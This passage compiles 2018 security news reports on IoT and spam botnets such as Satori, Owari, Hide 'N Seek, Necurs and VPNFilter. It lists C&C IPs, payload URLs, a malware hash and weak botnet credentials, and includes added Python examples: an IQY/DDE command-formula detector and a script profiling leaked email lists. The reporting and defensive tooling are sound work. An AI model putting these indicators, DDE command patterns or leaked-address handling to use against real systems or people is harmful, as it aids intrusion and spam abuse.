Now, Trend Micro says a new exploit is targeting port 5555. The security firm has observed a spike in activity on July 9-10, when network traffic came mainly from China and the US, followed by a second wave on July 15, primarily involving Korea.

“From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary,” Trend Micro explains.

After infecting devices, the malware targets a series of processes for termination and launches its own child processes, one of which is responsible for spreading the malware as a worm. It also opens a connection to the command and control (C&C) server.

The payload also contains a header with a number of targets and IP packet types to be sent, which could suggest the malware was designed to launch distributed denial of service (DDoS) attacks. It can send UDP, TCP SYN, and TCP ACK packets (with a random payload of random length), UDP packets with a random payload tunneled through Generic Routing Encapsulation (GRE), and TCP SYN packets.

Trend Micro also discovered that the downloaded binaries connect to the C&C server at 95[.]215[.]62[.]169, which was found to be linked to the Mirai variant Satori.

“It’s reasonable to believe that the same author was behind this sample and Satori,” Trend's security researchers say.

The malware’s worm-like spreading capabilities could suggest other attacks might follow the recently observed spikes in activity, Trend Micro also notes. The security firm suggests the actor behind the malware might have been “testing the effectiveness of their tools and tactics to prepare for a more serious attack.”

An online search reveals over 48,000 IoT systems vulnerable to ADB exploitations, but not all of them might be exposed, as some are likely behind routers with Network Address Translation (NAT). Even so, misconfigurations might result in these devices becoming accessible from the Internet, turning them into easy targets for the malware.

“All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength,” Trend Micro concludes.


Mirai, Gafgyt IoT Botnet Attacks Intensify
23.7.2018 securityweek BotNet

Security researchers are warning of a new wave of attacks associated with two infamous Internet of Things (IoT) botnets: Mirai and Gafgyt.

Behind some of the largest distributed denial of service (DDoS) attacks in history, Mirai had its source code leaked in October 2016, soon after it first emerged. Numerous Mirai variants have spawned from its source code since, the most recent of which include Wicked and Omni.

Also known as Bashlite, Lizkebab, and Torlus, Gafgyt was first spotted in 2014 and had its source code leaked in early 2015. By the summer of 2016, the number of ensnared devices peaked at over 1 million, though they were spread over multiple botnets.

Three recent infection campaigns associated with these two botnets have revealed an increased interest from malware authors towards exploiting vulnerabilities in IoT devices, rather than weak credentials.

The attacks also appear to suggest once again that there could be a connection between the two botnets, something that initial reports on Mirai two years ago were detailing as well.

The first campaign is associated with Omni, one of the latest evolutions of Mirai, and stands out in the crowd because of its exclusive use of exploits, Palo Alto Networks reveals.

The botnet targets a broad range of exploits: two flaws in Dasan GPON routers that were made public in May (which have been targeted by botnets ever since), a Huawei router security bug, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a JAWS Webserver command execution, and a remote code execution in CCTVs and DVRs from over 70 vendors.

The campaign also shows the use of two different encryption schemes, doesn’t attempt to propagate via credential brute-forcing, and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The IP the malware was using for serving payloads and as a command and control (C&C) server was also observed being used by some Gafgyt samples that emerged around the same time.

The second campaign was using the same exploits as the first series of attacks, but also attempted credential brute force attacks, some of which are default credentials in Camtron IP cameras and Control4 and ADC FlexWave Prism devices.

The researchers also noticed that some of the samples included some brand new DDoS methods and that some of the newest samples completely removed the exploits and went back to exclusively attempting brute-force compromise.

The third campaign, the security researchers reveal, was no longer attempting to infect devices with a Mirai variant, but was delivering malware built on the Gafgyt source code that also includes a layer-7 DDoS-targeting function (SendHTTPCloudflare).

The attacks were targeting nearly all exploits as the first campaign, along with the brute-forcing attempts observed as part of the second campaign, but also started using a D-Link DSL-2750B OS command injection exploit.

One of the effects of these new campaigns was a surge in attacks targeting Small-Office/Home Office (SOHO) network devices manufactured by Dasan and D-Link, as eSentire alerted. According to the security firm, over 3000 source IPs were involved in the attack, but all were coordinated by a single-source command.

As Palo Alto Networks points out, the new attacks prove once again how attackers can build large botnets consisting of different types of devices and control them from a single C&C server.

“This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices,” the security firm concludes.


Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours
22.7.2018 securityaffairs BotNet

The popular Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours, and it is also planning to target vulnerable Realtek routers.
NewSky Security first reported the birth of a huge new botnet: in just one day the botmaster compromised more than 18,000 Huawei routers.

NewSky security researcher Ankit Anubhav announced that the botnet had already infected 18,000 routers. The disconcerting aspect of the story is that the hacker gathered such a huge number of devices in a limited period of time without using any zero-day issue.

The same botnet was also reported today by experts from other security firms, including Qihoo 360 Netlab, Greynoise, and Rapid7.

360 Netlab
@360Netlab
We were tracking this botnet yesterday, the claimed 18000+ Huawei router number is probably inflated, as we were able to take a peek at the file which highly likely stored the infected ips, the total count was 10901. and attached is the graphic of the C2 for this botnet, big one.

Ankit Anubhav
@ankit_anubhav
Just in : IoT hacker identifying himself as "Anarchy" has claimed to hack about 18000+ Huawei routers.The vulnerability is 2017-17215, leaked last Christmas & used in satori

He also takes responsibility for massive uptick in Huawei scanning now as seen in @360Netlab scanmon. 1/n

3:43 AM - Jul 19, 2018
The botmaster has infected systems by exploiting the CVE-2017-17215 vulnerability in Huawei HG532 routers. Experts noticed that the attackers started scanning for the flaw, that could be triggered via port 37215, on July 18.
The botmaster is a hacker who goes online under the moniker “Anarchy.” According to Anubhav, he was previously identified as Wicked and was involved in the birth of the Mirai variant of the same name.

The Wicked Mirai botnet was first spotted by researchers at Fortinet, and Anubhav published an interview with the hacker on the NewSky blog.

Wicked/Anarchy is believed to be the threat actor behind other Mirai variants, including Omni and Owari (Sora).

As explained at the beginning of this post, Anarchy did not need any zero-day exploit to gather tens of thousands of devices in a few hours. CVE-2017-17215 is a well-known vulnerability that has been used by many other botnets, including the Mirai variant Satori, to gather zombies.

The CVE-2017-17215 zero-day vulnerability in the Huawei home router stems from the fact that the TR-064 technical report standard, designed for local network configuration, was exposed to the WAN through port 37215 (UPnP, Universal Plug and Play).

The exploit code used to target the Huawei routers is publicly available; in December, Ankit Anubhav discovered it on Pastebin.com.

“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017-17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” stated a blog post published by Anubhav.

At the time, the exploit code for CVE-2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiku).

The availability of the code online represents a serious risk: it could become a commodity in the criminal underground, and vxers could use it to build their own botnets.

Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code. Earlier in December, the author of the Brickerbot botnet, who goes online under the moniker “Janitor,” released a dump that contained snippets of Brickerbot source code.

NewSky Security analyzed the code and discovered that it used the CVE-2017-17215 exploit, which means the code had been available in the underground for a long time.

According to Bleeping Computer, Anarchy told Anubhav that he also plans to target the CVE-2014-8361 flaw in Realtek routers that is exploitable via port 52869.

“Testing has already started for the Realtek exploit during the night,” Anubhav told Bleeping Computer in a private conversation today. [Update: Both Rapid7 and Greynoise are confirming that scans for Realtek have gone through the roof today.]

Below are the MD5 and the C&C associated with the threat:


Ankit Anubhav
@ankit_anubhav
The attacker Anarchy has shared a list of infected victim IPs which at that point, I am not making public for obvious reasons. The bin in his botnet md5 >
c3cf80d13a04996b68d7d20eaf1baea8

As one can see, it uses only 1 exploit, 2017-17215. 2/n pic.twitter.com/F5BNNbf3bM

8:27 PM - Jul 18, 2018

SMII Mondher
@smii_mondher
Ketashi botnet
hxxp://104.244.72.82
hxxp://104.244.72.82/sister
hxxp://104.244.72.82/k
http://104.244.72.82/gpon#ketashi @360Netlab @ankit_anubhav @campuscodi

4:17 PM - Jul 19, 2018


Hide 'N Seek IoT Botnet Can Infect Database Servers
18.7.2018 securityweek BotNet

The Hide 'N Seek Internet of Things (IoT) botnet has recently added support for more devices and can also infect OrientDB and CouchDB database servers, Qihoo 360's NetLab researchers say.

When first detailed in January this year, the botnet was evolving and spreading rapidly, ensnaring tens of thousands of devices within days. Targeting numerous vulnerabilities, the malware was capable of data exfiltration, code execution, and interference with the device operation.

By early May, the malware had infected over 90,000 devices, added code to target more vulnerabilities, and also adopted persistence, being able to survive reboots. The persistence module, however, would only kick in if the infection was performed over the Telnet service.

A peer-to-peer (P2P) botnet, Hide 'N Seek has continued to evolve, and is currently targeting even more vulnerabilities than before. The botnet now also includes exploits for AVTECH devices (webcam) and Cisco Linksys routers, Qihoo 360's NetLab reveals.

Furthermore, the malware now includes 171 hardcoded P2P node addresses, has added a crypto-currency mining program to its code, and has also evolved into a cross-platform threat, with the addition of support for OrientDB and CouchDB database servers.

The botnet’s spreading mechanism includes a scanner borrowed from Mirai, targeting fixed TCP port 80/8080/2480/5984/23 and other random ports.

For infection, the malware attempts remote code execution using exploits targeting TPLink Routers, Netgear routers (also targeted by Reaper botnet and Mirai variant Wicked), AVTECH cameras, Cisco Linksys Routers, JAW/1.0, OrientDB, and Apache CouchDB.

The Hide 'N Seek bots attempt to contact other P2P peers using one of three methods: a hard-coded built-in list of 171 peer addresses, command-line arguments, and via other P2P peers. The node would also interact with the 171 peers for check-in purposes and during the follow-up interaction process.

“When started with no command-line args, HNS node will send lots of UDP check-in packets. IP addresses of these packets are randomized, while some others are set based on the built-in list,” the NetLab researchers explain.

Due to its peer-to-peer architecture, the botnet is rather difficult to shut down. Furthermore, the constant stream of updates received over the past half a year suggests that Hide 'N Seek will continue to evolve, likely broadening its capabilities and target list.


HNS Botnet evolves and targets cross-platform database solutions
11.7.2018 securityaffairs BotNet

The HNS IoT botnet (Hide and Seek) originally discovered by BitDefender in January evolves and now targets cross-platform database solutions.
Do you remember the Hide ‘N Seek (HNS) botnet?

The Hide ‘N Seek IoT botnet appeared in the threat landscape in January, when it was first spotted on January 10 by malware researchers from Bitdefender. It then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices in less than a week.


Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnet: unlike Mirai, Hajime doesn’t use C&C servers; instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

The HNS botnet looks for systems to infect by scanning the Internet for the fixed TCP ports 80/8080/2480/5984/23 and other random ports. The HNS botnet borrows code from the Mirai botnet.


Hide ‘N Seek is now also targeting cross-platform database solutions, and it is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.

“P2P-like botnets are hard to take down, and the HNS botnet has been continuously updated over the past few months,” reads the analysis published by Netlab Qihoo 360 researchers.

“some major updates we see:

Added exploits for AVTECH devices (webcam, webcam), CISCO Linksys router, JAWS/1.0 web server, Apache CouchDB, OrientDB; with the two devices mentioned in the original report, HNS currently supports 7 exploiting methods all together
Hard-coded P2P node addresses have been increased to 171;
In addition, we observed that the HNS botnet adds a cpuminer mining program, it is not functioning properly yet.
In particular, with the added support of OrientDB and CouchDB database servers, HNS is no longer just an IoT botnet, but a cross-platform botnet now.”
According to Netlab, the Hide ‘N Seek (HNS) botnet now targets the following types of devices using the following exploits:
TPLink-Routers RCE
Netgear RCE
(new) AVTECH RCE
(new) CISCO Linksys Router RCE
(new) JAW/1.0 RCE
(new) OrientDB RCE
(new) CouchDB RCE
Experts pointed out that HNS has also started dropping a miner payload, but the good news is that it is not functioning properly yet.

Further technical details on the Hide ‘N Seek botnet, including the IoCs, are reported in the analysis published by the Netlab team.


Necurs Campaign Uses Internet Query File Attachments
26.6.2018 securityweek  BotNet

The Necurs botnet has been using Internet Query (IQY) files in recent waves of spam attacks in an effort to thwart security protections.

Active since at least 2012 and currently considered to be the largest spam botnet, the operation has been famous for powering massive Locky ransomware campaigns in 2016 and 2017. The botnet ended last year with a spike in activity and was sending tens of millions of spam emails daily.

This past April, the botnet was observed using .URL files with modified icons to trick users into believing they are opening a different file type. The files would leverage the Server Message Block (SMB) protocol to execute a payload from a remote server, thus successfully evading certain spam filters.

Necurs has now switched to a new tactic to avoid detection and increase its chances of successful infection. IQY files are text files with a specific format that allow users to import data from external sources into Excel spreadsheets, and Windows automatically opens them in Excel.

The spam emails using IQY file attachments feature subject and file names containing terms that refer to sales promotions, offers, and discounts, Trend Micro reveals in a new report.

Once executed, the IQY file queries the URL indicated in its code. This results in data being pulled from the targeted URL into an Excel worksheet.

The fetched data, Trend Micro discovered, contains a script that abuses Excel’s Dynamic Data Exchange (DDE) feature to execute a command line and start a PowerShell process. Through this process, a remote PowerShell script is executed filelessly on the targeted system.

The script was designed to download an executable file, a Trojanized remote access application, and its final payload: the FlawedAMMYY backdoor. The malware was supposedly built using the leaked code of the Ammyy Admin remote access Trojan.

As part of more recent attacks, the script would download an image file before the final payload. This image, the security researchers say, is a disguised malware downloader that fetches an encrypted component file containing the same main backdoor routines.

FlawedAMMYY was designed to execute a series of commands from a remote malicious server, including: file manager, view screen, remote control, audio chat, RDP SessionsService (install/start/stop/remove), disable desktop background, disable desktop composition, disable visual effects, and show tooltip (mouse cursor blinking cause).

“Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity. In addition, its structure is the same as normal Web Queries. Therefore, a security solution that blocks malicious URLs could be used to defend against this threat,” Trend Micro notes.
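Since the query URL is the one visible indicator in an otherwise plain-text IQY file, a mail gateway can parse the attachment and judge that URL, and can then check what the query returns for DDE launch formulas. The Python below is an added example, not Trend Micro's or the Necurs operators' code: the .iqy samples, the trusted-host allow-list and the "fetched" worksheet text are all constructed for illustration.

```python
"""Parse Excel Web Query (.iqy) attachments, flag ones that pull data from
an untrusted URL, and scan returned worksheet text for DDE launch formulas.

Added example for illustration; samples and allow-list are constructed.
"""
import re
from urllib.parse import urlparse

# Constructed samples. The minimal Web Query layout Excel accepts is a
# "WEB" type line, a version line ("1") and the URL to query.
BENIGN_IQY = "WEB\n1\nhttps://intranet.example.test/sales/q2.csv\n"
SUSPECT_IQY = "WEB\n1\nhttp://203.0.113.10/promo/discount.iqy\n"

# Assumption: hosts your own workbooks are allowed to query.
TRUSTED_HOSTS = {"intranet.example.test"}

IP_LITERAL_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# DDE launch formulas take the shape "=server|'topic'!item", e.g. "=cmd|...!A0";
# the leading "=" may be replaced by "+", "-" or "@" in evasion variants.
DDE_RE = re.compile(r"^\s*[=+\-@]\s*\w+\s*\|.*!\s*[A-Za-z]+\d*", re.MULTILINE)

# Constructed stand-in for data a query could return; the last line is a
# harmless DDE formula that only echoes a string.
FETCHED_SAMPLE = "Product,Price\nWidget,9.99\n=cmd|' /c echo dde-test'!A0\n"


def parse_iqy(text):
    """Return (query_type, url) for an IQY file, or raise ValueError."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    return lines[0].upper(), lines[2]


def assess_iqy(text):
    """Classify an IQY attachment by the URL it would make Excel fetch."""
    qtype, url = parse_iqy(text)
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    reasons = []
    if host not in TRUSTED_HOSTS:
        reasons.append("host not on allow-list")
    if parsed.scheme != "https":
        reasons.append("non-HTTPS scheme")
    if IP_LITERAL_RE.match(host):
        reasons.append("IP-literal host")
    return {"type": qtype, "url": url, "host": host,
            "suspicious": bool(reasons), "reasons": reasons}


def find_dde_formulas(sheet_text):
    """Return the lines of fetched worksheet data that carry DDE launch formulas."""
    return [m.group(0).strip() for m in DDE_RE.finditer(sheet_text)]


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_IQY), ("suspect", SUSPECT_IQY)):
        print(label, assess_iqy(sample))
    print("DDE hits:", find_dde_formulas(FETCHED_SAMPLE))
```

Blocking on the URL verdict alone matches the Trend Micro note above; the DDE scan is a second check for gateways that sandbox the query themselves.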

To stay protected against such threats, strict security protocols and best practices are essential. Also, because this is a known attack vector, users receive two warning messages upon execution of the IQY file attachment; paying attention to those warnings can stop the infection.


Satori botnet is back again, experts observed a surge in port scan activity associated with it
17.6.2018 securityaffairs BotNet

This week, security experts observed a surge in port 8000 scan activity; researchers at Qihoo 360 Netlab determined that the unusual activity was associated with the Satori IoT botnet.

Experts from Qihoo 360 Netlab discovered that the author of the Satori botnet has integrated the proof-of-concept (PoC) exploit code for the XiongMai web server software package after it was published on June 8.

The code recently included in the Satori botnet exploits a buffer overflow vulnerability, tracked as CVE-2018-10088, in XiongMai uc-httpd 1.0.0. The exploit could be used by remote attackers to execute arbitrary code by sending a malformed packet via ports 80 or 8000.

“Two days ago, on 2018-06-14, we noticed that an updated Satori botnet began to perform network wide scan looking for uc–httpd 1.0.0 devices.” reads the report published by Qihoo 360 Netlab.

“Most likely for the vulnerability of XiongMai uc–httpd 1.0.0 (CVE-2018-10088). The scanning activities led to a surge in scanning traffic on ports 80 and 8000.”

[Image: Satori botnet scan on port 80]

[Image: Satori botnet scan on port 8000]

The XiongMai lightweight web server package is often included in the firmware of many IoT devices from Chinese vendors.

Data collected by honeypots run by Qihoo 360 Netlab and SANS ISC confirms that the Satori authors also included a second exploit, which allows the bot to target D-Link DSL-2750B devices.

The experts observed port 8000 scans drop on June 15, when the attackers started exploiting the PoC code against D-Link DSL-2750B routers via ports 80 and 8080.

[Image: Satori botnet scan on port 8080]

The experts started seeing a surge in scans for the above ports, instead of port 8000 associated with XionMai.

Data collected by security experts demonstrates the evolution of the Satori botnet: its author continues to add new exploits to make the botnet resilient to takedown attempts by law enforcement and security firms.

Further details, including Indicators of compromise (IoCs) for the Satori botnet are available in Qihoo 360 Netlab report.


Researcher found 43 Million email addresses leaked by the Trik spam botnet
14.6.2018 securityaffairs  BotNet

A security researcher from Vertek Corporation reported to Bleeping Computer that over 43 million email addresses have been leaked from the command and control server of a spam botnet.
An expert from Vertek Corporation spotted the C&C server while investigating a recent malware campaign distributing a version of the Trik trojan. The malicious code was used as first-stage malware to drop the GandCrab v3 ransomware.

Malware experts from the Proofpoint firm have recently begun tracking the Phorpiex/Trik botnet that was used by sophisticated threat actors to distribute a range of malware.

“It is not especially sophisticated or complex but has been active for almost a decade, flying under the radar and attracting a solid customer base of threat actors.” reads the analysis published by Proofpoint.

“As we began tracking this botnet more closely, we discovered that a number of familiar actors were repeatedly leveraging Trik’s power and distribution capabilities for delivery of their malware.”

Both pieces of malware downloaded the malicious files from a misconfigured server located at a Russian IP address.

The content of the server was accessible to anyone; the researcher discovered 2201 text files, labeled sequentially from 1.txt to 2201.txt, each containing a chunk of roughly 20,000 email addresses.

“The Vertek researcher believes the operators of this server have been using these recipient lists to service other crooks who contracted their services to distribute various malware strains via malspam campaigns.” reported Bleeping Computer.


“We pulled all of them to validate that they are unique and legitimate,” the researcher told Bleeping Computer earlier today. “Out of 44,020,000 potential addresses, 43,555,741 are unique.”

The researcher shared the findings with the popular cyber security expert Troy Hunt, who runs the Have I Been Pwned service, to determine the origin of the data.

The huge trove of email addresses comes from everywhere; the expert counted 4.6 million unique email domains (.gov, .com, and the domains of several private businesses).

The vast majority of the email addresses are old, belonging to services such as Yahoo (10.6 million) and AOL (8.3 million).

“Surprisingly, while there are many custom email domains included in the leak, there are very few Gmail addresses included, suggesting the email addresses database is either incomplete, or this malware campaign intentionally targeted users using older email services.” continues Bleeping Computer.

The Trik C&C server discovered by the expert goes offline at intermittent intervals.

Below are the top 10 email domains included in the leaked data (number of addresses, domain):

8907436 yahoo.com
8397080 aol.com
788641 comcast.net
433419 yahoo.co.in
432129 sbcglobal.net
414912 msn.com
316128 rediffmail.com
294427 yahoo.co.uk
286835 yahoo.fr
282279 verizon.net
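The validation step described above (pulling every chunk, confirming the addresses are unique and well-formed, then counting domains) is straightforward to script. The Python below is an added example and not the Vertek researcher's code: the chunk file names and contents are constructed stand-ins for the 2201 files on the server.

```python
"""Validate, de-duplicate and profile a leaked recipient list that is split
across numbered chunk files (1.txt, 2.txt, ...), as the Trik dump was.

Added example; the chunk contents below are constructed, real chunks held
roughly 20,000 addresses each.
"""
import re
from collections import Counter

# Loose syntax check: enough to reject junk lines, not a full RFC 5322 parser.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$")

# Constructed stand-in for the numbered text files found on the server.
CHUNKS = {
    "1.txt": "alice@yahoo.com\nBob@AOL.com\nalice@yahoo.com\nnot-an-email\n",
    "2.txt": "bob@aol.com\ncarol@comcast.net\ndave@example.gov\n",
    "3.txt": "erin@yahoo.co.uk\n alice@yahoo.com \n\nfrank@aol.com\n",
}


def normalise(addr):
    """Trim and case-fold one line; return None if it is not an address."""
    addr = addr.strip().lower()
    return addr if EMAIL_RE.match(addr) else None


def profile_leak(chunks):
    """Walk the chunks in numeric order and return totals plus per-domain counts
    of the unique addresses."""
    seen = set()
    domains = Counter()
    total = valid = 0
    for name in sorted(chunks, key=lambda n: int(n.split(".")[0])):
        for line in chunks[name].splitlines():
            if not line.strip():
                continue  # blank line, not a candidate address
            total += 1
            addr = normalise(line)
            if addr is None:
                continue  # junk line such as a truncated record
            valid += 1
            if addr in seen:
                continue  # duplicate across or within chunks
            seen.add(addr)
            domains[addr.rsplit("@", 1)[1]] += 1
    return {"total_lines": total, "valid": valid, "unique": len(seen),
            "unique_domains": len(domains), "by_domain": domains}


def top_domains(profile, n=10):
    """Return the n most common domains as (domain, count) pairs."""
    return profile["by_domain"].most_common(n)


if __name__ == "__main__":
    stats = profile_leak(CHUNKS)
    print({k: v for k, v in stats.items() if k != "by_domain"})
    for domain, count in top_domains(stats):
        print(f"{count:>8} {domain}")
```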


IoT Botnets Found Using Default Credentials for C&C Server Databases
8.6.2018 thehackernews  IoT  BotNet

Not following cybersecurity best practices could not only cost online users but also cost cybercriminals. Yes, sometimes hackers don't take best security measures to keep their infrastructure safe.
A variant of the IoT botnet called Owari, which relies on default or weak credentials to hack insecure IoT devices, was itself found using default credentials on the MySQL server integrated with its command and control (C&C) server, allowing anyone to read and write its database.
Ankit Anubhav, principal security researcher at IoT security firm NewSky Security, who found the botnets, published a blog post about his findings earlier today, detailing how the botnet authors themselves kept an incredibly weak username and password combination for their C&C server's database.


Guess what the credentials could be?
Username: root
Password: root
These login credentials helped Anubhav gain access to the botnet and fetch details about infected devices, the botnet authors who control the botnet and also some of their customers (a.k.a. black box users), who have rented the botnet to launch DDoS attacks.
"Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the botmaster is available) and cooldown time (time interval between the two attack commands) can also be observed," Anubhav wrote.

Besides this, Anubhav was also able to see the duration limit of the attack such as for how long a client can perform the DDoS attack, maximum available bots for an attack, and the list of various IPs targeted by the DDoS attack.
Anubhav also found another botnet, which was also built with a version of Owari and its database was also exposed via weak credentials.
The C&C servers of both the botnets were located at 80.211.232.43 and 80.211.45.89, which are now offline, as "botnet operators are aware that their IPs will be flagged soon due to the bad network traffic," Anubhav wrote. "Hence to stay under the radar, they often voluntarily change attack IPs."


FBI seizes control of a massive botnet that infected over 500,000 routers
7.6.2018 thehackernews  BotNet

Shortly after Cisco released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack.
Yesterday we reported on a piece of highly sophisticated IoT botnet malware that infected over 500,000 devices in 54 countries and was likely designed by a Russia-backed state-sponsored group in a possible effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday.
Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small office/home office (SOHO) routers and storage devices from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-attached storage (NAS) devices.


Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices.
The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm.
The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election.
"This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities," John Demers, the Assistant Attorney General for National Security, said in a statement.
Among other findings, Talos researchers found evidence that VPNFilter shares code with versions of BlackEnergy, the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia.
VPNFilter is designed so that it can be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, and conduct destructive cyber attack operations.


The seizure of the domain, which is part of VPNFilter's command-and-control infrastructure, allows the FBI to redirect the malware's stage-one callbacks (made in an attempt to reinfect the device) to an FBI-controlled server, which captures the IP addresses of infected devices and passes them on to authorities around the globe who can remove the malware.
Users of SOHO and NAS devices that are infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second stage malware, causing the persistent first-stage malware on their infected device to call out for instructions.
"Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure," the DoJ said.
Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or using default credentials, users are strongly recommended to change the default credentials on their devices to protect against the malware.
Moreover, always put your routers behind a firewall, and turn off remote administration until and unless you really need it.
If your router is by default vulnerable and can't be updated, it is time you buy a new one. You need to be more vigilant about the security of your smart IoT devices.


It’s not a joke, Owari botnet operators used root as username and password to access a C&C
7.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from NewSky Security discovered an IoT botnet controlled through poorly configured infrastructure: the botmaster used weak credentials to authenticate to the command-and-control server.

The researchers exploited the weak configuration to take over the MySQL server used to control the Owari botnet; the author had left port 3306 open, allowing authentication with “root” as both username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Investigation of the database allowed the expert to discover a User table that contains login credentials for the various users who control the botnet. Some entries could be associated with botmasters, others with customers of the botnet.

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet and was able to reach a known Owari operator who goes by “Scarface” online and provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 customers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course not: even though the expert took over the MySQL database, botnet operators continuously change attack IPs to stay under the radar once malicious traffic associated with some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.


Oops! Botnet Operators Use Default Credentials on Command and Control Server
6.6.2018 securityweek BotNet  IoT

Internet of Things (IoT) botnets prey on the use of default or weak credentials to compromise connected devices, but the operators of such a botnet also used default credentials in their operations.

As NewSky Security researchers recently discovered, the operators of the Mirai variant Owari botnet used default credentials on their command and control (C&C) server, thus allowing easy access to their database.

First spotted in late 2016, Mirai was designed to target poorly secured devices to ensnare them into large distributed denial of service (DDoS) botnets. Ever since its source code leaked online, Mirai spawned numerous variants, such as Masuta, Satori, and Okiru, as well as the more recent Wicked, Sora, Owari, and Omni iterations.

What most of these variants inherit from Mirai, the security researchers say, is the use of a MySQL database server for C&C. This database, they reveal, contains three tables: users, history, and whitelist.

A recently observed Mirai variant named Owari is using this MySQL server structure, but its operators made the very same mistakes as the owners of the devices they targeted: they failed to properly secure the server.

Thus, NewSky Security stumbled upon an Owari server on IP 80(.)211(.)232(.)43, with port 3306, the default port for MySQL database, open to the Internet.

What’s more, the security researchers discovered that the attackers used the root:root username and password pair, “one of the weakest credentials known to mankind,” to secure the database, and also enabled read/write access to everyone.

As Dr. Vesselin Bontchev points out, it’s not that easy to make a MySQL database accessible from anywhere, let alone to secure it so poorly that anyone can connect to it.

Vess
@VessOnSecurity
4 Jun
It's not exactly spelled out in the article, but the perp wasn't just stupid (using weak credentials). He was *creatively* stupid. You have to try hard, in order to make a MySQL database accessible to the whole world. Not something you can do accidentally. https://twitter.com/ankit_anubhav/status/1003741307024625666 …

Vess
@VessOnSecurity
Like, by default, MySQL listens only to localhost. If you really want to shoot yourself in the foot and access it over the Internet, it forces you to define *triplets* of user/password/host from which the database is accessible.

11:08 PM - Jun 4, 2018
